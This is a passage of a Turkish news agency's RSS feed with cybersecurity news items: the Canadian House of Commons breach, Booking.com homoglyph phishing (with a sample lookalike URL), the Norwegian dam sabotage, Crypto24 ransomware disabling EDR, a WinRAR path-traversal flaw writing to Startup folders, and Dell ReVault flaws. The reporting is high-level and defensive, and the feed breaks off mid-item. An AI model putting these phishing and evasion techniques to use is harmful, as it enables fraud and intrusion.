                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68a47af512695.webp" length="57304" type="image/webp"/>
            
            <pubDate>Mon, 18 Aug 2025 11:44:32 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>Kanada Avam Kamarası’nda siber saldırı nasıl gerçekleşti, hangi çalışan verileri çalındı, saldırıda hangi Microsoft açıklarının kullanılmış olabileceği değerlendiriliyor, yetkililer ne tür önlemler öneriyor</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p><br data-start="412" data-end="415">Kanada Avam Kamarası, geçtiğimiz Cuma günü yaşanan siber saldırının ardından veri ihlali soruşturması yürütüyor. CBC News’in aktardığına göre, çalışanlar Pazartesi günü gönderilen bir e-posta ile olay hakkında bilgilendirildi.</p>
<p></p>
<p data-start="645" data-end="998">Söz konusu saldırıda, Microsoft yazılımlarında bulunan güvenlik açığının istismar edilerek Avam Kamarası bilgisayar ve mobil cihazlarını yöneten bir veritabanına sızıldığı belirtildi. Saldırı sırasında çalışanlara ait kamuya açık olmayan veriler de çalındı. Bu veriler arasında isimler, görev unvanları, ofis konumları ve e-posta adresleri yer alıyor.</p>
<p data-start="1000" data-end="1171"><strong data-start="1000" data-end="1026">Dolandırıcılık Uyarısı</strong><br data-start="1026" data-end="1029">Avam Kamarası üyeleri ve çalışanları, çalınan verilerin kimlik sahteciliği ya da dolandırıcılık amaçlı kullanılabileceği konusunda uyarıldı.</p>
<p data-start="1173" data-end="1516">Kanada İletişim Güvenliği Kurumu’na (CSE) bağlı Kanada Siber Güvenlik Merkezi (Cyber Centre), soruşturmaya destek verdiğini açıkladı. Kurum tarafından yapılan açıklamada, saldırının belirli bir tehdit grubu veya devlet destekli aktörlerle ilişkilendirilmediği, siber olaylarda failleri tespit etmenin zaman ve kaynak gerektirdiği vurgulandı.</p>
<p data-start="1518" data-end="1886"><strong data-start="1518" data-end="1550">Microsoft Açıkları Ön Planda</strong><br data-start="1550" data-end="1553">Her ne kadar saldırıda kullanılan açık hakkında resmi açıklama yapılmasa da, Kanada Siber Merkezi kısa süre önce iki Microsoft güvenlik açığı konusunda ülke genelinde uyarıda bulunmuştu. Bunlardan biri SharePoint Server’daki CVE-2025-53770 (ToolShell) olarak bilinen açık, diğeri ise Exchange sunucularını etkileyen CVE-2025-53786.</p>
<p data-start="1888" data-end="2219">ToolShell açığı Temmuz ayından bu yana Çin destekli gruplar ve fidye yazılım çeteleri tarafından aktif olarak kullanılıyor. Bu açık aracılığıyla ABD Ulusal Nükleer Güvenlik İdaresi, Eğitim Bakanlığı, Florida Gelir İdaresi, Rhode Island Genel Meclisi ve Avrupa ile Orta Doğu’daki bazı devlet kurumlarının hedef alındığı biliniyor.</p>
<p data-start="2221" data-end="2444">CVE-2025-53786 ise Microsoft Exchange ortamlarında saldırganlara ağ içinde yatay hareket etme imkânı tanıyor. ABD Siber Güvenlik ve Altyapı Güvenliği Ajansı (CISA) geçtiğimiz hafta bu açık için acil direktif yayımlamıştı.</p>
<p data-start="2446" data-end="2623">Güvenlik uzmanları, Kanada’daki kurumların vakit kaybetmeden sistemlerini güncellemeleri gerektiğini, aksi halde benzer saldırılarla karşı karşıya kalınabileceğini belirtiyor.</p>
<p data-start="2625" data-end="2850"><strong data-start="2625" data-end="2637"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Booking.com kullanıcılarını hedef alan yeni oltalama saldırısı: Japonca karakter ‘ん’ URL’lerde gizlenerek sahte siteyi gerçekmiş gibi gösteriyor</title>
            <link>https://cumha.com.tr/bookingcom-kullanicilarini-hedef-alan-yeni-oltalama-saldirisi-japonca-karakter-%E3%82%93-urllerde-gizlenerek-sahte-siteyi-gercekmis-gibi-goesteriyor</link>
            <guid>https://cumha.com.tr/bookingcom-kullanicilarini-hedef-alan-yeni-oltalama-saldirisi-japonca-karakter-%E3%82%93-urllerde-gizlenerek-sahte-siteyi-gercekmis-gibi-goesteriyor</guid>
            <description><![CDATA[ Siber saldırganlar, Unicode tabanlı sahte karakterler kullanarak Booking.com müşterilerini hedef alan oltalama kampanyası başlattı. ‘ん’ karakteri URL’lerde eğik çizgiye benzetilerek kullanıcıları yanıltıyor, sahte site üzerinden zararlı yazılımlar indirtiliyor. Aynı yöntemle Intuit kullanıcılarının da hedef alındığı bildirildi. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68a47c514c0e1.webp" length="27558" type="image/webp"/>
            
            <pubDate>Mon, 18 Aug 2025 11:44:31 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>Booking.com kullanıcıları nasıl oltalama saldırısına maruz kalıyor, Unicode karakteri ‘ん’ URL’lerde nasıl kullanılıyor, Intuit kullanıcıları hangi yöntemle hedef alınıyor, saldırganların nihai amacı nedir</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p><br data-start="530" data-end="533">Booking.com müşterilerini hedef alan yeni bir oltalama kampanyası ortaya çıktı. Güvenlik araştırmacısı JAMESWT tarafından fark edilen saldırıda, saldırganlar Japonca hiragana alfabesinden “ん” karakterini kullanarak sahte bağlantıları gerçeğe yakın gösterebiliyor.</p>
<p></p>
<p data-start="800" data-end="1110">İlk bakışta Booking.com’un resmi adreslerine benziyormuş gibi görünen bu bağlantılar, kullanıcıları sahte alan adlarına yönlendiriyor. Örneğin, “<a data-start="945" data-end="1023" rel="noopener" target="_new" class="cursor-pointer">https://account.booking.comんdetailんrestric-access.www-account-booking.com/en/”</a> şeklinde görünen link, aslında www-account-booking[.]com adlı sahte bir domaine ait.</p>
<p data-start="1112" data-end="1407"><strong data-start="1112" data-end="1140">Zararlı Yazılım Dağıtımı</strong><br data-start="1140" data-end="1143">Kullanıcılar bu bağlantıya tıkladığında zararlı bir MSI dosyası indirilerek bilgisayara yükleniyor. Güvenlik araştırmaları, indirilen dosyanın bilgi hırsızları veya uzaktan erişim trojanları gibi ek kötü amaçlı yazılımlar kurmak için kullanıldığını ortaya koydu.</p>
<p data-start="1409" data-end="1644">Bu yöntem, “homoglif” olarak adlandırılan, birbirine çok benzeyen ancak farklı alfabelere ait karakterleri kullanarak yapılan oltalama saldırılarının bir örneği. Benzer teknikler daha önce de Cyrillic ve Latin harfleriyle görülmüştü.</p>
<p data-start="1646" data-end="2007"><strong data-start="1646" data-end="1681">Intuit Kullanıcıları da Hedefte</strong><br data-start="1681" data-end="1684">BleepingComputer tarafından bildirilen ayrı bir saldırıda ise Intuit kullanıcıları hedef alındı. Bu kampanyada “intuit.com” gibi görünen sahte alan adları aslında “Lntuit.com” şeklinde kayıtlı. Küçük harf kullanıldığında “L” harfinin “i” harfine çok benzemesi, kullanıcıların sahte bağlantıyı fark etmesini zorlaştırıyor.</p>
<p data-start="2009" data-end="2288">E-postalarda yer alan “Hesabımı doğrula” bağlantısına tıklayan kullanıcılar sahte sitelere yönlendirilirken, bağlantı doğrudan açıldığında ise gerçek Intuit giriş sayfasına geri yönlendiriliyor. Bu yöntemle saldırganların özellikle mobil kullanıcıları hedef aldığı düşünülüyor.</p>
<p data-start="2290" data-end="2645"><strong data-start="2290" data-end="2331">Daha Önce de Booking.com Hedef Alındı</strong><br data-start="2331" data-end="2334">Booking.com markası daha önce de oltalama saldırılarında kullanıldı. 2023’te otel müşterilerinin sahte sitelere yönlendirilerek kredi kartı bilgilerinin çalındığı, 2025’in Mart ayında ise Microsoft’un, konaklama sektörü çalışanlarını hedef alan başka bir oltalama kampanyası konusunda uyarı yaptığı biliniyor.</p>
<p data-start="2647" data-end="2802">Uzmanlar, kullanıcıların bağlantılara tıklamadan önce alan adlarını dikkatle incelemesi ve güncel güvenlik yazılımları kullanması gerektiğini belirtiyor.</p>
<p data-start="2804" data-end="3027"><strong data-start="2804" data-end="2816"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Norveç’te baraj saldırısı: Pro-Rus hackerlar su tahliye vanalarını açarak 7,2 milyon litre suyun akmasına yol açtı</title>
            <link>https://cumha.com.tr/norvecte-baraj-saldirisi-pro-rus-hackerlar-su-tahliye-vanalarini-acarak-72-milyon-litre-suyun-akmasina-yol-acti</link>
            <guid>https://cumha.com.tr/norvecte-baraj-saldirisi-pro-rus-hackerlar-su-tahliye-vanalarini-acarak-72-milyon-litre-suyun-akmasina-yol-acti</guid>
            <description><![CDATA[ Norveç güvenlik birimleri, Nisan ayında gerçekleşen baraj sabotajının arkasında pro-Rus hackerların olduğunu açıkladı. Hackerların Bremanger barajının dijital kontrol sistemini ele geçirerek tahliye vanalarını açtığı, olayın Norveç’in kritik altyapısına yönelik bir gövde gösterisi olduğu değerlendiriliyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68a47c63bde5a.webp" length="47698" type="image/webp"/>
            
            <pubDate>Mon, 18 Aug 2025 11:44:29 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>Norveç’te baraj sabotajı nasıl gerçekleşti, saldırıda ne kadar su tahliye edildi, hackerların amacı neydi, Norveçli yetkililer Rusya’yı nasıl değerlendiriyor</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p><br data-start="478" data-end="481">Norveç Polisi Güvenlik Servisi (PST), Nisan ayında yaşanan baraj saldırısının pro-Rus hackerlar tarafından gerçekleştirildiğini duyurdu. Açıklamaya göre saldırganlar, Bremanger barajındaki su akışını kontrol eden dijital sisteme sızarak tahliye vanalarını açtı.</p>
<p></p>
<p data-start="746" data-end="1142">PST Başkanı Beate Gangås, Arendal kentinde düzenlenen Arendalsuka ulusal forumunda yaptığı açıklamada olayın doğrudan zarar vermekten çok, Rusya’nın siber yeteneklerini sergilemeye yönelik olduğunu belirtti. Gangås, “Amaçları yıkım yaratmak değil, neler yapabileceklerini göstermek” ifadelerini kullandı. Ayrıca bu tür eylemlerin toplumda korku ve huzursuzluk yaratmayı hedeflediğini vurguladı.</p>
<p data-start="1144" data-end="1344"><strong data-start="1144" data-end="1169">Dört Saatlik Müdahale</strong><br data-start="1169" data-end="1172">Yerel basına göre baraj operatörleri yaklaşık dört saat içinde saldırıyı fark ederek vanaları yeniden kapattı. Bu süre zarfında 7,2 milyon litreden fazla su tahliye oldu.</p>
<p data-start="1346" data-end="1621">Haziran ayında Norveç Ulusal Kriminal Soruşturma Servisi (Kripos) de benzer bir sonuca ulaştı. Rus hacker grupları saldırıyı doğrulamak için Telegram üzerinden üç dakikalık bir video yayımladı. Videoda barajın kontrol paneli ve pro-Rus bir siber grubun işaretleri yer aldı.</p>
<p data-start="1623" data-end="1851"><strong data-start="1623" data-end="1668">Rusya ile İlişkilendirilen İkinci Saldırı</strong><br data-start="1668" data-end="1671">Bu olay, Norveç’te Rusya bağlantılı ikinci büyük siber saldırı olarak kayıtlara geçti. Daha önce ülkenin devlet hizmetlerine yönelik geniş çaplı bir DDoS saldırısı düzenlenmişti.</p>
<p data-start="1853" data-end="2071">Norveç İstihbarat Şefi Nils Andreas Stensønes, Rusya’nın Batı’ya karşı hibrit saldırılarla gerilimi artırdığını belirterek, “Norveç savaşta değil, ancak Rusya öngörülemez bir komşu ve en büyük tehdit konumunda” dedi.</p>
<p data-start="2073" data-end="2249"><strong data-start="2073" data-end="2085"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Crypto24 fidye yazılımı büyük şirketlere saldırdı, EDR devre dışı bırakma aracıyla güvenlik sistemlerini aşmayı başardı</title>
            <link>https://cumha.com.tr/crypto24-fidye-yazilimi-buyuk-sirketlere-saldirdi-edr-devre-disi-birakma-araciyla-guvenlik-sistemlerini-asmayi-basardi</link>
            <guid>https://cumha.com.tr/crypto24-fidye-yazilimi-buyuk-sirketlere-saldirdi-edr-devre-disi-birakma-araciyla-guvenlik-sistemlerini-asmayi-basardi</guid>
            <description><![CDATA[ ABD, Avrupa ve Asya’da büyük kuruluşları hedef alan Crypto24 fidye yazılım grubu, özel geliştirilmiş bir araçla güvenlik yazılımlarını etkisiz hale getirerek veri hırsızlığı ve dosya şifreleme saldırıları gerçekleştiriyor. Trend Micro araştırmacılarına göre saldırganlar eski fidye yazılım gruplarının üyelerinden oluşuyor olabilir. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68a47c707654d.webp" length="83996" type="image/webp"/>
            
            <pubDate>Mon, 18 Aug 2025 11:44:27 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>Crypto24 fidye yazılım grubu hangi sektörleri hedef alıyor, saldırılarda hangi güvenlik yazılımları devre dışı bırakılıyor, veri hırsızlığı nasıl gerçekleştiriliyor, Trend Micro araştırmacıları hangi bulguları paylaştı</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p><br data-start="508" data-end="511">Crypto24 adıyla bilinen fidye yazılım grubu, son aylarda büyük ölçekli şirketlere yönelik saldırılar düzenleyerek dikkat çekmeye başladı. Trend Micro araştırmacılarının yayımladığı rapora göre saldırılar ABD, Avrupa ve Asya’da finans, üretim, teknoloji ve eğlence sektörlerinde faaliyet gösteren yüksek değerli hedeflere yönelik olarak gerçekleştirildi.</p>
<p></p>
<p data-start="868" data-end="1161">Grubun en erken faaliyetleri 2024 yılının Eylül ayında rapor edilmiş olsa da, saldırılar son dönemde daha gelişmiş yöntemlerle yürütülmeye başlandı. Araştırmacılar, kullanılan teknikler ve araçlar nedeniyle grubun eski fidye yazılım oluşumlarının üyelerinden oluşabileceğini değerlendiriyor.</p>
<p data-start="1163" data-end="1497"><strong data-start="1163" data-end="1185">Saldırı Yöntemleri</strong><br data-start="1185" data-end="1188">Saldırılar, Windows sistemlerinde yönetici hesaplarının etkinleştirilmesi veya yeni yerel hesapların oluşturulmasıyla başlıyor. Daha sonra saldırganlar, sistemde keşif faaliyetleri gerçekleştirerek donanım bilgilerini ve kullanıcı hesaplarını topluyor. Bu süreçte zararlı hizmetler ve görevler tanımlanıyor.</p>
<p data-start="1499" data-end="1655">Trend Micro’nun raporuna göre, kullanılan yöntemlerden biri WinMainSvc adlı keylogger hizmeti, diğeri ise MSRuntime adı verilen fidye yazılım yükleyicisi.</p>
<p data-start="1657" data-end="2028"><strong data-start="1657" data-end="1701">EDR Sistemlerini Devre Dışı Bırakan Araç</strong><br data-start="1701" data-end="1704">Crypto24’ün dikkat çeken yöntemlerinden biri, RealBlindingEDR adlı açık kaynak kodlu aracın özelleştirilmiş bir versiyonunun kullanılması. Bu araç, Trend Micro, Kaspersky, Sophos, SentinelOne, Malwarebytes, McAfee, Cisco ve Fortinet gibi birçok güvenlik yazılımını hedef alarak çekirdek düzeyinde devre dışı bırakabiliyor.</p>
<p data-start="2030" data-end="2286">Trend Micro ürünlerine yönelik olarak ise saldırganların XBCUninstaller.exe aracını kötüye kullandığı belirtildi. Normal şartlarda sistem sorunlarını gidermek için kullanılan bu araç, saldırı sırasında güvenlik ajanlarını kaldırmak amacıyla çalıştırıldı.</p>
<p data-start="2288" data-end="2592"><strong data-start="2288" data-end="2327">Veri Hırsızlığı ve Şifreleme Süreci</strong><br data-start="2327" data-end="2330">Saldırılar sırasında “Microsoft Help Manager” adıyla gizlenen keylogger aktif pencere başlıklarını ve tuş vuruşlarını kaydediyor. Ayrıca saldırganlar SMB paylaşımları üzerinden ağda yayılım sağlıyor ve çalınan verileri özel bir araçla Google Drive’a aktarıyor.</p>
<p data-start="2594" data-end="2834">Son aşamada ise sistemlerdeki gölge kopyalar silinerek fidye yazılımı devreye sokuluyor. Trend Micro, şifreleme yöntemleri veya fidye notları hakkında ayrıntılı bilgi paylaşmazken, savunma ekiplerine yönelik göstergeler listesi yayımladı.</p>
<p data-start="2836" data-end="3073"><strong data-start="2836" data-end="2848"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>WinRAR’daki sıfırıncı gün açığı, RomCom zararlı yazılımını yüklemek için hedefli saldırılarda kullanıldı</title>
            <link>https://cumha.com.tr/winrardaki-sifirinci-gun-acigi-romcom-zararli-yazilimini-yuklemek-icin-hedefli-saldirilarda-kullanildi</link>
            <guid>https://cumha.com.tr/winrardaki-sifirinci-gun-acigi-romcom-zararli-yazilimini-yuklemek-icin-hedefli-saldirilarda-kullanildi</guid>
            <description><![CDATA[ CVE-2025-8088 olarak izlenen ve WinRAR 7.13 sürümüyle giderilen dizin geçişi açığı, oltalama e-postalarıyla dağıtılan özel hazırlanmış RAR arşivleri üzerinden istismar edildi. Açık, saldırganların dosyaları Windows başlangıç klasörüne yerleştirerek uzaktan kod çalıştırmasına imkân tanıyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68967b3bd942a.webp" length="43244" type="image/webp"/>
            
            <pubDate>Sat, 09 Aug 2025 01:29:38 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>CVE-2025-8088 açığı nasıl çalışıyor, RomCom grubu bu açığı hangi yöntemle istismar etti, açık hangi WinRAR sürümüyle kapatıldı, kullanıcılar korunmak için ne yapmalı</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p style="margin: 0 0 14px 0;"><strong>WinRAR</strong>’ın Windows sürümlerinde tespit edilen <strong>CVE-2025-8088</strong> güvenlik açığının, yamalanmadan önce hedefli oltalama saldırılarında aktif olarak kullanıldığı ortaya çıktı. <strong>ESET</strong> araştırmacıları <strong>Anton Cherepanov</strong>, <strong>Peter Košinár</strong> ve <strong>Peter Strýček</strong> tarafından keşfedilen açık, WinRAR 7.13 sürümünde kapatıldı.</p>
<p style="margin: 0 0 14px 0;">Dizin geçişi (<em>directory traversal</em>) hatasından kaynaklanan bu açık, özel hazırlanmış RAR arşivlerinin, kullanıcı tarafından belirtilen dizin yerine saldırganın tanımladığı bir konuma dosya çıkartmasına izin veriyor. Bu yöntemle, zararlı çalıştırılabilir dosyalar Windows’un başlangıç klasörlerine (<code>%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup</code> veya <code>%ProgramData%\Microsoft\Windows\Start Menu\Programs\StartUp</code>) yerleştirilebiliyor. Kullanıcı bir sonraki oturum açtığında, bu dosyalar otomatik olarak çalışarak saldırgana sistem üzerinde uzaktan kod çalıştırma imkânı sağlıyor.</p>
<p style="margin: 0 0 14px 0;">ESET, saldırılarda hedefli oltalama e-postalarıyla gönderilen RAR dosyalarının bu açığı kullanarak <strong>RomCom</strong> arka kapı zararlı yazılımını yüklediğini belirledi. RomCom (<em>Storm-0978</em>, <em>Tropical Scorpius</em> veya <em>UNC2596</em> olarak da bilinir) Rusya bağlantılı bir tehdit grubu olup fidye yazılımı, veri hırsızlığı ve kimlik bilgisi toplama kampanyalarıyla tanınıyor. Grup daha önce Cuba ve Industrial Spy fidye yazılım operasyonlarıyla ilişkilendirilmişti.</p>
<p style="margin: 0 0 14px 0;">WinRAR otomatik güncelleme özelliği sunmadığından, tüm kullanıcıların <a href="https://www.win-rar.com" style="color: #1d4ed8; text-decoration: none;">win-rar.com</a> adresinden en son sürümü manuel olarak indirmesi öneriliyor. ESET, açığın istismarına dair detaylı bir raporu daha sonra yayımlayacağını açıkladı.</p>
<p style="margin: 0; font-size: 14px; color: #6b7280;">Kaynak: <strong>CUMHA - CUMHUR HABER AJANSI</strong></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Google, Salesforce tabanlı veri hırsızlığı saldırılarında müşteri bilgilerinin çalındığını doğruladı</title>
            <link>https://cumha.com.tr/google-salesforce-tabanli-veri-hirsizligi-saldirilarinda-musteri-bilgilerinin-calindigini-dogruladi</link>
            <guid>https://cumha.com.tr/google-salesforce-tabanli-veri-hirsizligi-saldirilarinda-musteri-bilgilerinin-calindigini-dogruladi</guid>
            <description><![CDATA[ Google, Haziran ayında Salesforce CRM ortamlarından birinin ShinyHunters grubu tarafından ihlal edildiğini ve küçük-orta ölçekli işletmelere ait iletişim verilerinin ele geçirildiğini açıkladı. Şirket, saldırının sınırlı süreli erişimle gerçekleştiğini ve verilerin büyük ölçüde herkese açık iş bilgileri olduğunu belirtti. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68967bca0effd.webp" length="54238" type="image/webp"/>
            
            <pubDate>Sat, 09 Aug 2025 01:29:36 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>Google veri ihlalinde hangi bilgiler ele geçirildi, ShinyHunters grubu Salesforce saldırılarını nasıl gerçekleştiriyor, bu saldırı dalgasında hangi şirketler hedef alındı, fidye ödemeyen şirketler için nasıl bir tehdit söz konusu</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p style="margin: 0 0 14px 0;"><strong>Google</strong>, <strong>ShinyHunters</strong> adlı fidye ve veri hırsızlığı grubunun yürüttüğü Salesforce tabanlı saldırıların son kurbanı oldu. Haziran 2025’te yaşanan olayda, şirketin kurumsal Salesforce CRM ortamlarından biri ihlal edildi ve küçük-orta ölçekli işletmelere ait müşteri verileri çalındı.</p>
<p style="margin: 0 0 14px 0;">Google’ın açıklamasına göre, ihlal edilen sistemde işletme adları, iletişim bilgileri ve ilgili notlar bulunuyordu. Erişim, sınırlı bir zaman diliminde sağlandıktan sonra engellendi. Şirket, verilerin çoğunun zaten kamuya açık olabilecek temel iş bilgileri olduğunu vurguladı.</p>
<p style="margin: 0 0 14px 0;"><strong>ShinyHunters</strong> grubu, saldırılarda çalışanları hedef alan sesli kimlik avı (<em>vishing</em>) ve sosyal mühendislik yöntemleriyle Salesforce hesaplarına erişim sağlıyor. Bu yöntemle müşteri veritabanlarını indirip şirketlerden fidye talep ediyor. Grup, fidye ödemeyen şirketlerin verilerini sızdırma veya satma tehdidinde bulunuyor.</p>
<p style="margin: 0 0 14px 0;"><em>BleepingComputer</em>’a konuşan ShinyHunters, birçok Salesforce ortamını ihlal ettiklerini ve saldırıların hâlen devam ettiğini doğruladı. Grup, bazı şirketleri e-posta yoluyla şantaj yaparken, bir şirketin verilerini sızdırmamak için 4 Bitcoin (yaklaşık 400 bin dolar) ödediği öğrenildi.</p>
<p style="margin: 0 0 14px 0;">ShinyHunters, geçmişte <strong>PowerSchool</strong>, <strong>Oracle Cloud</strong>, <strong>Snowflake</strong>, <strong>AT&amp;T</strong>, <strong>NitroPDF</strong>, <strong>Wattpad</strong> ve <strong>MathWay</strong> gibi birçok kurumun veri ihlallerinden sorumlu tutulmuştu.</p>
<p style="margin: 0;">Bu saldırılardan etkilenen diğer şirketler arasında <strong>Adidas</strong>, <strong>Qantas</strong>, <strong>Allianz Life</strong>, <strong>Cisco</strong> ve <strong>LVMH</strong> bünyesindeki <strong>Louis Vuitton</strong>, <strong>Dior</strong> ile <strong>Tiffany &amp; Co.</strong> da yer alıyor.</p>
<p style="margin: 14px 0 0 0; font-size: 14px; color: #6b7280;">Kaynak: <strong>CUMHA - CUMHUR HABER AJANSI</strong></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Dell’in ControlVault3 güvenlik açıkları, Windows oturum açma korumasını aşarak kalıcı zararlı yazılım yüklemeye izin veriyor</title>
            <link>https://cumha.com.tr/dellin-controlvault3-guvenlik-aciklari-windows-oturum-acma-korumasini-asarak-kalici-zararli-yazilim-yuklemeye-izin-veriyor</link>
            <guid>https://cumha.com.tr/dellin-controlvault3-guvenlik-aciklari-windows-oturum-acma-korumasini-asarak-kalici-zararli-yazilim-yuklemeye-izin-veriyor</guid>
            <description><![CDATA[ Cisco Talos’un “ReVault” adını verdiği beş güvenlik açığı, 100’den fazla Dell Latitude ve Precision dizüstü modelini etkiliyor. Açıklar, fiziksel erişimi olan saldırganların Windows oturumunu atlatmasına, yönetici yetkileri kazanmasına ve sistem yeniden kurulumlarından sonra bile kalıcı olan zararlı yazılım yüklemesine olanak tanıyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68967d63dd839.webp" length="51790" type="image/webp"/>
            
            <pubDate>Sat, 09 Aug 2025 01:29:34 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>ReVault güvenlik açıkları Dell dizüstülerde hangi riskleri doğuruyor, fiziksel erişimle saldırı nasıl gerçekleştirilebiliyor, Dell bu açıklar için hangi güncellemeleri yayımladı, kullanıcılar hangi ek önlemleri almalı</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p style="margin: 0 0 14px 0;"><strong>Dell</strong>’in iş odaklı <strong>Latitude</strong> ve <strong>Precision</strong> serisi dizüstü bilgisayarlarında kullanılan <strong>ControlVault3</strong> donanım tabanlı güvenlik çözümünde beş kritik güvenlik açığı tespit edildi. <strong>Cisco Talos</strong> tarafından “<em>ReVault</em>” olarak adlandırılan açıklar, hem ControlVault3 bellenimini hem de Windows API bileşenlerini etkiliyor.</p>
<p style="margin: 0 0 14px 0;">ControlVault, parolalar, biyometrik veriler ve güvenlik kodlarını anakart üzerindeki <strong>Unified Security Hub (USH)</strong> modülünde saklıyor. Ancak <strong>CVE-2025-24311</strong>, <strong>CVE-2025-25050</strong> (out-of-bounds), <strong>CVE-2025-25215</strong> (arbitrary free), <strong>CVE-2025-24922</strong> (stack overflow) ve <strong>CVE-2025-24919</strong> (güvensiz serileştirme) gibi açıklar zincirlenerek, saldırganların bellenimde keyfi kod çalıştırmasına imkân tanıyor.</p>
<p style="margin: 0 0 14px 0;">Cisco Talos’a göre, fiziksel erişimi olan bir saldırgan cihazı açarak özel bir USB konnektörüyle USH modülüne doğrudan erişebilir. Bu yöntem, Windows oturum açma bilgisi veya tam disk şifreleme parolası olmadan açıkların istismar edilmesini mümkün kılıyor. Başarılı istismar, yönetici yetkisi kazanmayı, Windows oturumunu atlamayı ve parmak izi doğrulamasını manipüle ederek herhangi bir parmak izini kabul ettirmeyi sağlayabiliyor.</p>
<p style="margin: 0 0 14px 0;"><strong>Dell</strong>, Mart–Mayıs 2025 döneminde ControlVault3 sürücüsü ve bellenimi için güvenlik güncellemeleri yayımladı. Etkilenen modellerin tam listesi Dell’in güvenlik duyurusunda yer alıyor.</p>
<p style="margin: 0 0 14px 0;">Cisco Talos, kullanıcıların sistemlerini Windows Update veya Dell’in resmi sitesinden güncel tutmalarını, kullanılmayan parmak izi okuyucu, akıllı kart okuyucu ve NFC gibi güvenlik donanımlarını devre dışı bırakmalarını öneriyor. Yüksek riskli ortamlarda parmak iziyle giriş özelliğinin kapatılması, BIOS üzerinden kasa açılma algılamanın (<em>chassis intrusion detection</em>) etkinleştirilmesi ve Windows’ta Gelişmiş Oturum Açma Güvenliği’nin (ESS) devreye alınması da tavsiye ediliyor.</p>
<p style="margin: 14px 0 0 0; font-size: 14px; color: #6b7280;">Kaynak: <strong>CUMHA - CUMHUR HABER AJANSI</strong></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>WhatsApp, grup davetleri üzerinden yapılan dolandırıcılıklara karşı yeni güvenlik özelliğini devreye aldı</title>
            <link>https://cumha.com.tr/whatsapp-grup-davetleri-uzerinden-yapilan-dolandiriciliklara-karsi-yeni-guvenlik-oezelligini-devreye-aldi</link>
            <guid>https://cumha.com.tr/whatsapp-grup-davetleri-uzerinden-yapilan-dolandiriciliklara-karsi-yeni-guvenlik-oezelligini-devreye-aldi</guid>
            <description><![CDATA[ WhatsApp, tanımadığınız kişiler tarafından grup sohbetlerine eklenmeniz durumunda “güvenlik özeti” kartı göstererek olası dolandırıcılık girişimlerini tespit etmenizi sağlayacak yeni bir özellik sundu. Şirket, yılın ilk yarısında 6,8 milyon dolandırıcı hesap kapattığını açıkladı. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68967d9b5bdad.webp" length="42052" type="image/webp"/>
            
            <pubDate>Sat, 09 Aug 2025 01:29:33 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>WhatsApp’ın güvenlik özeti özelliği nasıl çalışıyor, grup davetleri dolandırıcılıkta hangi yöntemlerle kullanılıyor, kapatılan 6, 8 milyon hesap hangi faaliyetlerle bağlantılı, dolandırıcılık merkezleri hangi taktikleri kullanıyor</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p style="margin: 0 0 14px 0;"><strong>WhatsApp</strong>, kullanıcılarını grup sohbetleri üzerinden hedef alan dolandırıcılık girişimlerine karşı yeni bir güvenlik özelliği duyurdu. Buna göre, kişi listenizde olmayan biri sizi bir gruba eklediğinde, ekrana bir “<em>güvenlik özeti</em>” (<em>safety overview</em>) kartı çıkacak.</p>
<p style="margin: 0 0 14px 0;">Bu kart, grubun oluşturulma tarihi, üye sayısı, potansiyel dolandırıcılık uyarıları ve grup davetlerini nasıl kontrol edebileceğinize dair bilgiler içeriyor. Kullanıcılar, sohbeti hiç açmadan gruptan ayrılabilecek ya da bilgileri inceledikten sonra sohbete girerek bağlamı görebilecek. Bu süre zarfında grup bildirimleri sessize alınacak.</p>
<p style="margin: 0 0 14px 0;">Uygulama ayrıca, kişi listenizde olmayan bir numaradan mesaj aldığınızda, gönderen hakkında ek bilgi vererek dikkatli olmanız konusunda uyarı yapacak. WhatsApp, “Bilinmeyen bir numaradan gelen, hızlı kazanç vaat eden veya olağandışı bir mesaj aldığınızda duraklayın, sorgulayın ve doğrulayın” tavsiyesinde bulundu.</p>
